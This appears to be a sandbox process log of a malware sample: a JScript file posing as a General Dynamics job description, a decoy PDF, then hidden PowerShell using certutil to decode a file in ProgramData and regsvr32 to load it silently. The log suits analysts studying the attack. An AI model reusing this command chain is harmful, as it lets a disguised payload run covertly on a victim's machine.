wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Safety Manager JD (General Dynamics HR Division II).jse"
2560chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "C:\ProgramData\System Safety Manager JD (General Dynamics HR Division II).pdf"
2656chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef42ef1e8,0x7fef42ef1f8,0x7fef42ef208
2768chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2660 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
2856powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\vjVr53p.yOOL C:\Windows\..\ProgramData\zT1fbtn.oN5L
2700certutil.exe "C:\Windows\system32\certutil.exe" -decode C:\Windows\..\ProgramData\vjVr53p.yOOL C:\Windows\..\ProgramData\zT1fbtn.oN5L
2960powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden cmd /c cmd /c regsvr32.exe /s C:\Windows\..\ProgramData\zT1fbtn.oN5L
2192